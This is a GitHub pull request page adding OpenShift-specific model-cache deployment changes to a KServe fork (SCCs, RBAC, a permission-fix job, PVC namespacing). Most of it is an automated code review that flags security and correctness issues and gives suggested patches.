Skip to content

modelcache modifications for ODH/Openshift #1190

Closed
VedantMahabaleshwarkar wants to merge 5 commits intoopendatahub-io:masterfrom
VedantMahabaleshwarkar:modelcachev2odhmaster
Closed

modelcache modifications for ODH/Openshift #1190
VedantMahabaleshwarkar wants to merge 5 commits intoopendatahub-io:masterfrom
VedantMahabaleshwarkar:modelcachev2odhmaster

Conversation

@VedantMahabaleshwarkar
Copy link

@VedantMahabaleshwarkar VedantMahabaleshwarkar commented Mar 12, 2026

What this PR does / why we need it:

Fixes https://issues.redhat.com/browse/RHOAIENG-41859, https://issues.redhat.com/browse/RHOAIENG-41858

Feature/Issue validation/testing:

Testing steps followed : https://gist.github.com/VedantMahabaleshwarkar/671eefd47a8a7c1abfcd09063c0c8350

Checklist:

  • Have you added unit/e2e tests that prove your fix is effective or that this feature works?
  • Has code been commented, particularly in hard-to-understand areas?
  • Have you made corresponding changes to the documentation?
  • Have you linked the JIRA issue(s) to this PR?

Summary by CodeRabbit

Release Notes

  • New Features

    • Added OpenShift-specific overlay with security context constraints and CA injection support.
    • Introduced permission fix image configuration for handling filesystem permission issues.
    • Added filesystem writability detection and automatic permission remediation.
  • Chores

    • Updated storage mount path standardization.
    • Enhanced RBAC permissions for resource finalizers and persistent volume management.
    • Updated security context handling for restricted environments.

The cherry-pick of 929ff6a introduced the ImagePullSecrets test inside
a Context("When creating an inference service with modelcar and raw
deployment") block, but the ODH fork already had the same test as a
standalone It() at the top level. Both used the same resource names
(serviceName "modelcar-raw-deployment", runtime "vllm-runtime"), causing
the second test to fail with a resource collision when running the full
suite.

Remove the standalone duplicate, keeping the Context-wrapped version
from upstream.

Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>
Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>
Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>
Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>
Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>
@openshift-ci
Copy link

openshift-ci bot commented Mar 12, 2026

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: VedantMahabaleshwarkar

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Details Needs approval from an approver in each of these files:
  • OWNERS [VedantMahabaleshwarkar]

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@coderabbitai
Copy link

coderabbitai bot commented Mar 12, 2026

📝 Walkthrough

Walkthrough

This pull request introduces OpenShift-specific deployment infrastructure for KServe's local model feature, including new SecurityContextConstraints, RBAC rules for finalizers and persistent volume access, and refactored storage path handling. Key changes include: mount path redirection from /mnt/models to /var/lib/kserve, addition of a permission-fix job mechanism to handle non-writable filesystems with SELinux context adjustments, namespace-scoped PVC creation for model downloads, Dockerfile user privilege enforcement (root during build, non-root at runtime), and expanded RBAC permissions for persistent volume/claim operations and finalizer management. Python and Go APIs are updated to include a new permissionFixImage configuration field.

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Issues

Security: Unsafe SELinux MCS level extraction — In pkg/controller/v1alpha1/localmodelnode/controller.go, the getProcessMCSLevel() function reads /proc/self/attr/current and extracts the MCS level via string splitting without validation. The returned value is directly interpolated into a shell chcon command without sanitization. If parsing is incorrect or the format differs, injected shell metacharacters could execute arbitrary commands. Validate and escape the MCS level before use; consider using SELinux library bindings instead of shell commands.

Security: Privilege escalation via permission-fix job — The new launchPermissionFixJob() creates a Job running as root with elevated capabilities and arbitrary volume mounts. While guarded by isWritable() checks, the mechanism assumes the /proc/self/attr/current read and MCS parsing are trustworthy. An attacker controlling node environment variables or cgroup namespaces could influence MCS level parsing. Add explicit validation of MCS format (must match pattern like c[0-9]+\.c[0-9]+ or similar) before passing to chcon. Verify the Job's SecurityContext does not grant unintended NET_ADMIN or other dangerous capabilities.

Data integrity: Breaking PVC path change — Storage initializer path construction changed from pvc://{pvcName}/models/{storageKey}{subPath} to pvc://{pvcName}/{storageKey}{subPath}, removing the /models/ segment. Existing PVCs with data stored under /models/ will be inaccessible after this change. No migration logic is provided. Verify all deployed instances have empty or remapped storage, or provide a migration utility/documentation. This is a breaking change requiring operator intervention.

Concurrency: Finalizer cleanup without retry logic — RBAC rules for localmodelcaches/finalizers, localmodelnamespacecaches/finalizers, and localmodelnodes/finalizers are added, but no corresponding finalizer removal logic is evident in the diffs. If a finalizer is set but the removal code fails silently, resources will leak and block deletion indefinitely (CWE-416: Use After Free / resource leak). Ensure all controllers that set finalizers implement robust removal handlers and test deletion under failure conditions.

Configuration: Conflicting namespace sourcingconfig/overlays/odh/params.yaml adds a second entry for the same image path targeting DaemonSet kind alongside the existing Deployment entry. Kustomize behavior with duplicate paths and different kinds is order-dependent and error-prone. Consolidate into a single replacement rule or use distinct paths for each kind to avoid silent override issues.

Operations: PVC namespace scoping adds operational complexity — PVCs are now created in a configurable jobNamespace rather than the LocalModel's namespace. If jobNamespace and LocalModel namespaces differ, cleanup and multi-tenancy isolation becomes fragile. Ensure finalizers properly clean up PVCs across namespace boundaries, and document the namespace lifecycle expectations. Test scenarios where jobNamespace is deleted before LocalModel resources.

Security: Non-root Dockerfile user change may break existing mounts — Adding USER 1000:1000 in Dockerfile final stages changes runtime identity. If init or runtime code relies on root privilege (e.g., for device access, package installation, or ownership changes), this will silently fail at runtime. Audit entrypoint scripts and init processes for hardcoded root assumptions. The permission-fix job is a compensating control but should not mask upstream privilege assumption violations.

Testing: Large test removal without explanation — Two large test cases in pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go validating ImagePullSecrets handling were removed (~137 lines). No new tests replace this coverage. Ensure ImagePullSecrets functionality is still tested elsewhere or restore these cases; this appears to be an unintentional deletion.

🚥 Pre-merge checks | ✅ 1 | ❌ 1

❌ Failed checks (1 inconclusive)

Check name Status Explanation Resolution
Title check ❓ Inconclusive The PR title is vague and does not clearly convey the primary changes; it uses the generic term 'modifications' without specifying what was modified or why. Revise the title to be more specific and descriptive, e.g., 'Add OpenShift-specific localmodel deployment with PV/PVC and security context support' or similar that reflects the core intent of the changeset.
✅ Passed checks (1 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

📝 Coding Plan
  • Generate coding plan for human review comments

Comment @coderabbitai help to get the list of available commands and usage tips.

Tip

You can make CodeRabbit's review stricter and more nitpicky using the `assertive` profile, if that's what you prefer.

Change the reviews.profile setting to assertive to make CodeRabbit's nitpick more issues in your PRs.

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 16

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (6)
pkg/controller/v1alpha1/localmodel/controller_test.go (1)

914-948: ⚠️ Potential issue | 🟠 Major

Assert cross-namespace PVC cleanup after delete.

Line 914 moves the download PVC into modelCacheNamespace, so this test no longer exercises a same-namespace child. The current assertions only prove that the CR disappears; they still pass if the finalizer leaks the PVC in the job namespace. Add a post-delete Eventually(... IsNotFound(err)) for pvcLookupKey so the test covers the only valid cleanup path here.

Suggested change
 			// Now delete the LocalModelNamespaceCache
 			Expect(k8sClient.Delete(ctx, cachedModel)).Should(Succeed())

 			Eventually(func() bool {
 				err := k8sClient.Get(ctx, modelLookupKey, cachedModel)
 				return err != nil && errors.IsNotFound(err)
 			}, timeout, interval).Should(BeTrue(), "LocalModelNamespaceCache should be deleted after finalizer cleanup")
+
+			Eventually(func() bool {
+				err := k8sClient.Get(ctx, pvcLookupKey, persistentVolumeClaim)
+				return err != nil && errors.IsNotFound(err)
+			}, timeout, interval).Should(BeTrue(), "Download PVC should be deleted by finalizer cleanup")
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodel/controller_test.go` around lines 914 -
948, The test currently moves the download PVC into modelCacheNamespace
(pvcLookupKey) but only asserts the CR deletion, so it doesn't verify the PVC
was cleaned up; after deleting cachedModel and asserting the CR is gone, add an
Eventually assertion that attempts to Get the PVC via pvcLookupKey
(persistentVolumeClaim) and expects errors.IsNotFound(err) to be true, ensuring
the PVC is deleted; use the same timeout/interval and k8sClient.Get(ctx,
pvcLookupKey, persistentVolumeClaim) pattern as earlier to avoid race
conditions.
python/kserve/kserve/models/v1beta1_local_model_config.py (1)

71-99: ⚠️ Potential issue | 🟠 Major

Do not insert permission_fix_image before reconcilation_frequency_in_secs in the public constructor.

This breaks backward compatibility for positional callers of V1beta1LocalModelConfig(...). External SDK users passing reconcilation_frequency_in_secs as the 8th positional argument will have that value silently bind to permission_fix_image instead, leaving the reconciliation frequency unset without error. Move permission_fix_image after reconcilation_frequency_in_secs to preserve positional argument semantics.

Suggested fix
-    def __init__(self, default_job_image=None, disable_volume_management=None, enabled=False, fs_group=None, job_namespace='', job_ttl_seconds_after_finished=None, permission_fix_image=None, reconcilation_frequency_in_secs=None, local_vars_configuration=None):  # noqa: E501
+    def __init__(self, default_job_image=None, disable_volume_management=None, enabled=False, fs_group=None, job_namespace='', job_ttl_seconds_after_finished=None, reconcilation_frequency_in_secs=None, permission_fix_image=None, local_vars_configuration=None):  # noqa: E501
@@
-        if permission_fix_image is not None:
-            self.permission_fix_image = permission_fix_image
         if reconcilation_frequency_in_secs is not None:
             self.reconcilation_frequency_in_secs = reconcilation_frequency_in_secs
+        if permission_fix_image is not None:
+            self.permission_fix_image = permission_fix_image
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/models/v1beta1_local_model_config.py` around lines 71 -
99, The constructor V1beta1LocalModelConfig.__init__ currently places the
parameter permission_fix_image before reconcilation_frequency_in_secs which
breaks positional-argument compatibility; reorder the parameters so
reconcilation_frequency_in_secs appears before permission_fix_image in the
method signature and move the corresponding conditional assignment block (the if
reconcilation_frequency_in_secs ... and if permission_fix_image ...) so
reconcilation_frequency_in_secs is checked/assigned prior to
permission_fix_image, ensuring the attribute names
_reconcilation_frequency_in_secs and _permission_fix_image (and their public
setters default_job_image, disable_volume_management, enabled, fs_group,
job_namespace, job_ttl_seconds_after_finished) remain unchanged.
localmodel-agent.Dockerfile (1)

22-25: ⚠️ Potential issue | 🟠 Major

Pin go-licenses to a specific version.

CWE-494: @latest fetches an unpinned upstream binary on every build. Since this tool gates license compliance, a compromised release or supply-chain attack silently bypasses security controls and breaks build reproducibility. Pin to an immutable version.

Patch
-RUN go install github.com/google/go-licenses@latest
+RUN go install github.com/google/go-licenses@vX.Y.Z
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@localmodel-agent.Dockerfile` around lines 22 - 25, The Dockerfile currently
installs go-licenses with an unpinned reference ("go install
github.com/google/go-licenses@latest"), which allows supply-chain changes and
breaks reproducibility; change that invocation to a pinned, immutable version
(replace `@latest` with a specific release tag or module version/commit hash) and
rebuild using that pinned version so the subsequent uses of
/opt/app-root/src/go/bin/go-licenses (the check and save commands) run a known,
fixed binary; ensure the chosen tag is a stable release (e.g., a vX.Y.Z tag or
commit SHA) and update any documentation or build notes to document the pinned
version.
localmodel.Dockerfile (1)

22-25: ⚠️ Potential issue | 🟠 Major

Pin go-licenses to a specific version instead of @latest.

CWE-494: Non-pinned dependency enables supply-chain attacks. Each build resolves a different upstream release; a compromised or updated version of go-licenses can bypass license checks or corrupt the build. Use an explicit version or commit hash.

Patch
+ARG GO_LICENSES_VERSION=vX.Y.Z
-RUN go install github.com/google/go-licenses@latest
+RUN go install github.com/google/go-licenses@${GO_LICENSES_VERSION}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@localmodel.Dockerfile` around lines 22 - 25, The Dockerfile currently
installs go-licenses with an unpinned version ("go install
github.com/google/go-licenses@latest"); replace `@latest` with a specific, audited
release tag or commit hash (e.g., a vX.Y.Z tag or a commit SHA) so the build is
reproducible and not vulnerable to supply-chain changes; update the installation
line that produces /opt/app-root/src/go/bin/go-licenses and any related build
docs to reference the chosen pinned version and, if desired, add a short comment
with the upstream release URL or checksum for future audits.
config/localmodelnodes/manager.yaml (1)

65-69: ⚠️ Potential issue | 🟡 Minor

hostPath volume presents container escape risk.

Per coding guidelines, hostPath mounts should be avoided. While this may be intentional for caching models on the node filesystem, consider:

  1. An attacker with container access could potentially read/write arbitrary host files if path escapes occur.
  2. The path /models is writable (readOnly: false on line 57).

If hostPath is required, ensure the OpenShift SCC or PodSecurityPolicy restricts which paths can be mounted. The overlay's PVC-backed approach (localmodelnode-pv-pvc.yaml) is preferable when feasible.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/localmodelnodes/manager.yaml` around lines 65 - 69, The hostPath
volume under volumes with hostPath.path "/models" and readOnly false introduces
a container escape risk; replace it with a PVC-backed volume (use the existing
localmodelnode-pv-pvc.yaml pattern) and mount that PVC instead of hostPath, or
if hostPath is absolutely required, make the mount readOnly, add explicit path
restrictions via OpenShift SCC/PodSecurityPolicy, and document the security
rationale; update the volume declaration and any references to the "models"
volume accordingly (e.g., in the pod spec that mounts "models").
charts/kserve-localmodel-resources/files/resources.yaml (1)

126-135: ⚠️ Potential issue | 🟠 Major

Cluster-wide secrets read access is overly permissive (CWE-732).

The kserve-localmodelnode-agent-role ClusterRole grants get, list, watch on secrets across all namespaces. The controller code only accesses secrets within a specific job namespace—jobNamespace from the LocalModelNodeReconciler configuration. Tighten permissions by converting to a Role scoped to that namespace, or restrict to specific secret names via resourceNames.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-localmodel-resources/files/resources.yaml` around lines 126 -
135, The ClusterRole kserve-localmodelnode-agent-role currently allows
cluster-wide get/list/watch on secrets; restrict this by either (A) converting
this ClusterRole into a namespaced Role in resources.yaml scoped to the
reconciler's jobNamespace (the namespace used by LocalModelNodeReconciler) and
update the corresponding RoleBinding to bind in that namespace, or (B) keep it
as a ClusterRole but replace the broad "secrets" resource permission with a
resourceNames list containing only the specific secret names the controller
reads (derived from jobNamespace configuration), ensuring verbs remain limited
to get/list/watch. Locate kserve-localmodelnode-agent-role in resources.yaml and
apply one of these fixes and adjust bindings accordingly.
🧹 Nitpick comments (9)
pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go (3)

116-130: Error handling logs but continues, leaving partial state.

When CreatePV (line 116-118) or CreatePVC (line 128-130) fails, the error is logged but execution continues to the next iteration or subsequent steps. This can leave the system in an inconsistent state where a PV exists without its corresponding PVC, or vice versa.

Consider returning the error to trigger a requeue, allowing the reconciler to retry the entire operation:

♻️ Proposed fix to propagate errors
 	for _, nodeGroup := range nodeGroups {
 		pvSpec := nodeGroup.Spec.PersistentVolumeSpec
 		pv := corev1.PersistentVolume{Spec: pvSpec, ObjectMeta: metav1.ObjectMeta{
 			Name: localModel.Name + "-" + nodeGroup.Name + "-" + localModel.Namespace + "-download",
 		}}
 		if err := CreatePV(ctx, c.Clientset, c.Scheme, c.Log, pv, nil, localModel); err != nil {
 			c.Log.Error(err, "Create PV err", "name", pv.Name)
+			return ctrl.Result{}, err
 		}

 		pvc := corev1.PersistentVolumeClaim{
 			ObjectMeta: metav1.ObjectMeta{
 				Name: localModel.Name + "-" + nodeGroup.Name + "-" + localModel.Namespace + "-download",
 			},
 			Spec: nodeGroup.Spec.PersistentVolumeClaimSpec,
 		}
 		pvc.Spec.VolumeName = pv.Name

 		if err := CreatePVC(ctx, c.Clientset, c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel); err != nil {
 			c.Log.Error(err, "Create PVC err", "name", pvc.Name)
+			return ctrl.Result{}, err
 		}
 	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
around lines 116 - 130, The CreatePV/CreatePVC calls log errors but continue,
leaving partial state; change the reconciler to propagate failures by returning
the error (instead of only logging) so the controller will requeue and retry;
specifically, in the block that calls CreatePV(ctx, c.Clientset, c.Scheme,
c.Log, pv, nil, localModel) and the subsequent CreatePVC(ctx, c.Clientset,
c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel) handle
non-nil err by returning that err (or a wrapped contextual error including
pv.Name/pvc.Name) from the reconcile function so the operation is aborted and
retried rather than proceeding.

128-128: No validation of JobNamespace before use.

localModelConfig.JobNamespace is used directly without checking if it's empty or valid. If misconfigured, this could create PVCs in an unintended namespace (e.g., the default namespace if empty string is treated as default).

🛡️ Proposed defensive check
+	if localModelConfig.JobNamespace == "" {
+		c.Log.Error(nil, "JobNamespace is not configured in localModelConfig")
+		return ctrl.Result{}, fmt.Errorf("JobNamespace must be configured for namespace-scoped local model cache")
+	}
+
 	// Step 3 - Creates PV & PVC for model download (in jobNamespace, same as cluster-scoped)
 	for _, nodeGroup := range nodeGroups {

Note: You'd need to add "fmt" to imports.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
at line 128, The code calls CreatePVC with localModelConfig.JobNamespace without
validating it; add a defensive check before that call in the reconciler to
ensure localModelConfig.JobNamespace is non-empty and a valid namespace (e.g.,
if empty, either set it to localModel.Namespace or return an error), and if
invalid return/record a clear error (use c.Log.Errorf or return fmt.Errorf)
rather than proceeding to CreatePVC; update imports to include fmt if you use
fmt.Errorf.

106-108: Error from ReconcileLocalModelNode is logged but not returned.

Similar to the PV/PVC creation, if ReconcileLocalModelNode fails, the error is logged but execution continues. This may cause subsequent steps (PV/PVC creation) to proceed despite the node reconciliation failing.

♻️ Proposed fix
 	// Step 2 - Adds this model to LocalModelNode resources in the node group
 	if err := ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel, nodeGroups); err != nil {
 		c.Log.Error(err, "failed to reconcile LocalModelNode for namespace cache")
+		return ctrl.Result{}, err
 	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
around lines 106 - 108, The call to ReconcileLocalModelNode currently logs
errors but does not stop reconciliation, allowing downstream PV/PVC creation to
run even on failure; change the block in localmodelnamespacecache_reconciler.go
so that if ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel,
nodeGroups) returns an error you both log it and return the error (or wrap it)
from the surrounding reconcile method instead of continuing, ensuring the
reconcile function (the caller) stops and propagates the failure.
pkg/apis/serving/v1beta1/configmap.go (2)

391-400: Inconsistent error handling compared to sibling functions.

Other New*Config functions wrap unmarshalling errors with context (e.g., NewIngressConfig at line 303). This function returns the raw error, making debugging harder.

♻️ Suggested fix
 func NewLocalModelConfig(isvcConfigMap *corev1.ConfigMap) (*LocalModelConfig, error) {
 	localModelConfig := &LocalModelConfig{}
 	if localModel, ok := isvcConfigMap.Data[LocalModelConfigName]; ok {
 		err := json.Unmarshal([]byte(localModel), &localModelConfig)
 		if err != nil {
-			return nil, err
+			return nil, fmt.Errorf("unable to parse localModel config json: %w", err)
 		}
 	}
 	return localModelConfig, nil
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/apis/serving/v1beta1/configmap.go` around lines 391 - 400, The
NewLocalModelConfig function returns raw JSON unmarshal errors while sibling
constructors like NewIngressConfig wrap errors with context; update
NewLocalModelConfig to wrap the error from json.Unmarshal with a descriptive
message (include LocalModelConfigName and that it failed to parse into
LocalModelConfig) before returning so callers get context, mirroring the
error-wrapping pattern used by NewIngressConfig and other New*Config functions.

172-172: Validate PermissionFixImage after unmarshalling (CWE-20: Improper Input Validation).

PermissionFixImage is unmarshalled from ConfigMap data without validation, violating the requirement to validate all data from json.Unmarshal before use. Attacker-controlled image references can trigger unauthorized registry pulls or supply chain attacks. Validate image reference format and implement an allowlist of permitted registries.

♻️ Suggested validation
// Add validation function
func validateContainerImageRef(image string) error {
	if image == "" {
		return nil // optional field
	}
	// Reject unsafe characters; consider using distribution/reference for canonical validation
	if strings.ContainsAny(image, " \t\n\r") {
		return fmt.Errorf("image reference contains invalid characters: %q", image)
	}
	return nil
}

Then in NewLocalModelConfig:

 func NewLocalModelConfig(isvcConfigMap *corev1.ConfigMap) (*LocalModelConfig, error) {
 	localModelConfig := &LocalModelConfig{}
 	if localModel, ok := isvcConfigMap.Data[LocalModelConfigName]; ok {
 		err := json.Unmarshal([]byte(localModel), &localModelConfig)
 		if err != nil {
 			return nil, err
 		}
+		if err := validateContainerImageRef(localModelConfig.PermissionFixImage); err != nil {
+			return nil, fmt.Errorf("invalid localModel config: %w", err)
+		}
+		if err := validateContainerImageRef(localModelConfig.DefaultJobImage); err != nil {
+			return nil, fmt.Errorf("invalid localModel config: %w", err)
+		}
 	}
 	return localModelConfig, nil
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/apis/serving/v1beta1/configmap.go` at line 172, Add validation for the
PermissionFixImage field after unmarshalling by implementing a
validateContainerImageRef(image string) error helper and invoking it in
NewLocalModelConfig to reject unsafe image references and enforce an allowlist
of permitted registries; specifically, have validateContainerImageRef return nil
for empty (optional) values, reject whitespace or control characters and other
unsafe characters, verify the registry host is in your allowlist, and
propagate/return an error from NewLocalModelConfig if validation fails so
callers can refuse untrusted ConfigMap input.
pkg/controller/v1alpha1/localmodelnode/controller_test.go (1)

1456-1539: This spec only covers the non-SELinux fallback path.

In envtest getProcessMCSLevel() is usually empty, so this never exercises the branch that production OpenShift nodes are likely to take. Make the MCS reader injectable so the test can force a non-empty /proc/self/attr/current result and catch cross-namespace label bugs.

As per coding guidelines, **: Test coverage/quality for changed or critical paths.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller_test.go` around lines 1456
- 1539, The test only exercises the non-SELinux fallback because
getProcessMCSLevel() reads /proc and can't be controlled in envtest; make the
MCS reader injectable by refactoring getProcessMCSLevel into a function variable
or dependency (e.g., add a field mcsReader func() (string, error) on the
reconciler or a package-level var getProcessMCSLevelFunc) and use that in the
code path that builds the permission-fix Job, then update the test "Should
include MCS level in permission fix job chcon command" to set the injected
reader to return a non-empty value like "s0:c28,c27" (and restore it after the
test) so the Job command includes "-l <mcs>" and the test exercises the SELinux
branch.
pkg/controller/v1alpha1/localmodelnode/file_utils.go (1)

82-90: Use os.CreateTemp() for temporary probe files instead of fixed .write-test filename.

While this is a per-node local cache directory (not shared storage), temporary files should still use randomized names via os.CreateTemp() to follow Go best practices and avoid potential conflicts if the probe is called concurrently or during testing.

Suggested fix
 func (f *FileSystemHelper) isWritable() bool {
-	testFile := filepath.Join(f.modelsRootFolder, ".write-test")
-	file, err := os.Create(testFile) //nolint:gosec // G304: test file in controlled directory
+	file, err := os.CreateTemp(f.modelsRootFolder, ".write-test-*")
 	if err != nil {
 		return false
 	}
-	_ = file.Close()
-	_ = os.Remove(testFile)
+	name := file.Name()
+	if err := file.Close(); err != nil {
+		_ = os.Remove(name)
+		return false
+	}
+	if err := os.Remove(name); err != nil {
+		return false
+	}
 	return true
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go` around lines 82 - 90,
Replace the fixed probe file in FileSystemHelper.isWritable with a randomized
temp file: use os.CreateTemp(f.modelsRootFolder, ".write-test-*") to create the
temp file (capture file and err), close and remove it, and return false on any
error; update the function name reference (isWritable on FileSystemHelper)
accordingly and ensure cleanup happens even on close/remove errors so concurrent
probes won't conflict.
config/overlays/odh-with-modelcache/localmodel-scc.yaml (1)

19-20: seLinuxContext: RunAsAny is permissive.

Consider MustRunAs with an appropriate SELinux type (e.g., container_runtime_t) for defense-in-depth on OpenShift. RunAsAny allows pods to run with any SELinux context, weakening mandatory access controls.

Proposed refinement
 seLinuxContext:
-  type: RunAsAny
+  type: MustRunAs
+  seLinuxOptions:
+    type: container_t
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh-with-modelcache/localmodel-scc.yaml` around lines 19 -
20, Replace the permissive seLinuxContext type value "RunAsAny" with a stricter
setting by updating the seLinuxContext block to use "MustRunAs" and specify an
appropriate SELinux type (for example "container_runtime_t" or another
cluster-approved type); locate the seLinuxContext section and change the type
field accordingly so the SCC enforces the chosen SELinux context instead of
allowing any.
charts/kserve-localmodel-resources/files/resources.yaml (1)

394-409: Base chart uses hostPath mount — acceptable if overlay replaces it.

The DaemonSet mounts hostPath /models at /var/lib/kserve. Per coding guidelines, hostPath mounts are a security concern. However, the ODH overlay (config/overlays/odh-with-modelcache/kustomization.yaml lines 42-47) replaces this with a PVC.

For vanilla Kubernetes deployments using this base chart directly, the hostPath remains. Consider adding a comment or documentation noting that production OpenShift deployments should use the ODH overlay or configure persistent storage.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-localmodel-resources/files/resources.yaml` around lines 394 -
409, The DaemonSet currently uses a hostPath volume named "models" mounted at
/var/lib/kserve (and serviceAccountName kserve-localmodelnode-agent), which can
be unsafe for production; add a clear inline YAML comment next to the
volumes/mount (or a short note in chart README) that this hostPath is intended
for local/dev use only and that production/OpenShift deployments should use the
odh-with-modelcache overlay (which replaces the hostPath with a PVC) or supply
their own persistent storage; ensure the comment references the "models" volume
name and the mountPath /var/lib/kserve so maintainers know exactly what to
replace.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 143-152: DeletePVC/DeletePV currently log errors but always allow
the finalizer removal, risking orphaned PVC/PV; change the logic in the
DeletePVC and DeletePV flows so that on deletion failure you do not remove the
finalizer: either return the error to requeue the reconciliation loop (for
immediate retry) or implement exponential backoff and only clear the finalizer
after a confirmed successful deletion; additionally, before attempting deletion
check PVC status/claimRef (or use the pod controller reference check in the same
controller) to detect "in-use" (bound to pods) and if in-use, requeue or wait
until pods are terminated/released to avoid PVC stuck in Terminating — update
the code paths that remove the finalizer (the finalizer removal block) to only
run after successful delete confirmation or backoff success.

In `@config/overlays/odh-with-modelcache/localmodelnode-pv-pvc.yaml`:
- Around line 12-15: The PV currently uses hostPath (path:
/var/lib/kserve/models, type: DirectoryOrCreate) and references storageClassName
"local-storage" which is not defined in this repo; either add a StorageClass
manifest named "local-storage" (or switch to the standard "local" provisioner)
and document it in the deployment prerequisites, and ensure the PV manifest (the
resource referencing hostPath) includes node affinity limiting nodes to label
kserve/localmodel=worker, accessModes: ReadWriteOnce, and
persistentVolumeReclaimPolicy: Delete to match the intended mitigations;
alternatively replace the hostPath PV with a proper local PV/backing using the
local-volume-provisioner pattern rather than raw hostPath.

In `@config/overlays/odh/kustomization.yaml`:
- Line 19: The delete patch patches/remove-storagecontainer.yaml is placed in
the shared ODH overlay (odh) and will delete ClusterStorageContainer/default for
every ODH install; remove the reference from the odh kustomization and add that
single delete entry to the modelcache-specific overlay's kustomization instead
so the patch only applies when the modelcache overlay is selected (update the
odh kustomization to drop the path and add the path to the modelcache overlay
kustomization).

In `@config/overlays/odh/params.env`:
- Around line 14-15: The env entries kserve-localmodel-controller and
kserve-localmodelnode-agent point to personal mutable images
(quay.io/vedantm/...:latest); replace these with the official
quay.io/opendatahub/ image names and use immutable references (prefer pinned
digests or explicit semver tags) so production uses stable, auditable images;
update the values for kserve-localmodel-controller and
kserve-localmodelnode-agent accordingly and ensure the tags are not ":latest"
but a digest or specific version.
- Line 1: The env entry currently sets kserve-controller to a personal, unpinned
image "quay.io/vedantm/kserve-controller:latest"; update the value for the
kserve-controller variable to use the official registry image
"quay.io/opendatahub/kserve-controller" and avoid the :latest tag (prefer a
specific released tag) so the line becomes
kserve-controller=quay.io/opendatahub/kserve-controller[:<release-tag>] ensuring
the official image and a fixed tag are used.

In `@localmodel-agent.Dockerfile`:
- Line 2: The Dockerfile's builder image reference (the FROM line for the
"builder" stage) uses the mutable tag
"registry.access.redhat.com/ubi9/go-toolset:1.25"; replace this with the exact
image digest (e.g., registry.access.redhat.com/ubi9/go-toolset@sha256:<digest>)
to pin the builder image immutably. Fetch the authoritative digest for the
desired 1.25 image from Red Hat’s registry or official source, update the FROM
line to use that `@sha256` digest, and keep the "AS builder" alias intact.

In `@localmodel.Dockerfile`:
- Line 2: The Dockerfile uses a floating tag in the builder stage ("FROM
registry.access.redhat.com/ubi9/go-toolset:1.25 AS builder"); replace that tag
with an immutable digest by fetching the image's current sha256 digest from the
registry and updating the FROM line to use the image@sha256:<digest> form so the
builder stage is pinned; ensure you update the exact "FROM
registry.access.redhat.com/ubi9/go-toolset:1.25 AS builder" line to the
digest-based reference and commit the change.

In `@pkg/controller/v1alpha1/localmodel/reconcilers/utils.go`:
- Around line 236-249: The cleanup currently logs failures while deleting the
download PV/PVC and then proceeds to remove the finalizer; change this to return
any error encountered so reconcile is retried and finalizer not removed on
partial cleanup. In the block referencing DeletePV/DeletePVC and
v1beta1.GetInferenceServiceConfigMap/NewLocalModelConfig, propagate and return
errors from DeletePV and DeletePVC instead of only logging them, and for
DeletePVC use the job namespace value persisted on the LocalModel resource (e.g.
localModel.Spec.JobNamespace or the field used at creation) rather than
recomputing it from the current ConfigMap (remove reliance on
GetInferenceServiceConfigMap/NewLocalModelConfig for the PVC namespace). Ensure
the function that calls this cleanup handles the returned error so finalizer
removal is deferred until cleanup succeeds.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go`:
- Around line 23-24: Remove the cluster-wide RBAC markers that grant
persistentvolume and persistentvolumeclaim create/delete rights from the
LocalModelNode agent (specifically the +kubebuilder:rbac lines for
